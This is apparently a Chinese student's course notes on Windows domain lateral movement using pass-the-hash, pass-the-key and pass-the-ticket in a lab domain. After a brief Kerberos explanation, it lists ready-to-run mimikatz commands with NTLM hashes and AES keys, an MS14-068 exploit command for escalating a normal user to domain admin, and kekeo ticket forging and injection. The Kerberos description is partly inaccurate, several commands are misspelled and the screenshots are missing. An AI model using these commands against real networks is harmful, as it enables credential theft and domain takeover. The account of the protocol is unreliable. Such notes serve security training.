内网渗透-PTHPTTPTK

内网渗透-PTH&PTT&PTK

！–看小迪老师课程自己做的笔记
！–之前gitee图床出问题了，部分图片实在找不到了，想深入研究可以去看小迪老师课程

一、kerberos协议具体工作方法

1、客户机将明文密码进行NTLM哈希，然后和时间戳一起加密（使用krbtgt密码hash作为秘钥），发送给kdc（域控），kdc对用户进行检测，成功之后创建TGT

2、将TGT进行加密签名返回给客户机，只有域用户（krbtgt）才能读取kerberos中的TGT数据

3、客户机将TGT发送给域控制器KDC请求TGS（票证授权服务）票证，并且对TGT进行检测

4、检测成功后，将目标服务账户的NTLM以及TGT进行加密，将加密后的结果返回给客户机。

PTH：利用lM或者NTLM的值进行的渗透测试

PTT：利用票据凭证TGT进行的渗透测试

PTK：利用ekeys aes256进行的渗透测试

总结：KB2871997的影响

PTH：没打补丁前任意用户都可以连接，打了补丁只能使用administrator连接

PTK：打了补丁才能任意用户连接，采用aes256连接

PTT：ptt攻击不是简单的NTLM认证了，他是利用kerberos协议进行攻击。MS14-068攻击，允许域内任何一个普通用户，将自己的权限提升至域管理员权限。

二、使用PTH域横向移动---->Mimikatz (未打补丁KB2871997)

注意：当禁用了NTLM认证，psexec、smbexec等无法利用NTLM hash远程连接，但是使用mimikatz依然可以攻击成功。

PTH-ntlm传递（未打补丁KB2871997）

域管理员连接

sekurlsa::pth /user:administrator /domain:ghy /ntlm:d4a1605da045ea9ea9873e349dabbbfe
#弹出的cmd窗口执行
dir \\计算机名\c$

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FB7rMpTW-1666783160176)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706193041187.png)]

域普通用户连接

sekurlsa::pth /user:websec /domain:ghy /ntlm:0778dc8266297ac5062bfa47156499c9
#弹出的窗口执行
dir \\DC.ghy.com\c$

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IXKXtbmP-1666783160176)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706195918045.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dq6to8Xh-1666783160177)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706195937233.png)]

工作组连接

sekurlsa::pth /user:administrator /domain:WORKGROUP /ntlm:0778dc8266297ac5062bfa47156499c9
#弹出窗口执行
dir \\192.168.139.131\c$
dir \\webserver.ghy.com\c$

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3MntCZ7Q-1666783160178)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706200523112.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cJJuN62H-1666783160178)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706200543281.png)]

三、使用PTK域横向移动---->Mimikatz（打补丁KB2871997）

pth ntlm administrator传递

sekurlsa::pth /user:administrator /domain:ghy /ntlm：d4a1605da045ea9ea9873e349dabbbfe

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yddOSHd6-1666783160180)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706204208356.png)]

ptk aes256 传递

#aes256 获取
sekurlsa::ekeys
sekurlsa::pth /user:websec /domain:ghy /aes256:d61a2e608802a77332b4d98923052b0182e2592e28039d756dc402a12f09a8a9

ptt 票证传递

kist   查看票证
kist /purge   清除票证

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pMqK5PKP-1666783160180)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220708194802306.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fHO59tcI-1666783160181)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220708194927815.png)]

whoami /user   查看用户sid

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SBCI8Wkf-1666783160181)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220708195020452.png)]

1、利用MS14-068漏洞，实现普通用户直接获取域控system权限

mimikatz # kerberos::purge    清除当前机器中的凭证
mimikatz # ketberos::list     查看当前机器凭证
ms14-068.exe -u websec@ghy.com -s S-1-5-21-3451611406-1810481340-3913844723-1105 -d 192.168.139.131 -p ghy.00925   生成TGT数据
mimikatz # kerberos::ptc 票据文件    将票据注入内存中

2、利用kekeo

kekeo "tgt::ask" /user:websec /domain:ghy.com /ntlm:0778dc8266297ac5062bfa47156499c9生成票据
kerberos::ptt 票据文件@ghy.com.kirbi    导入数据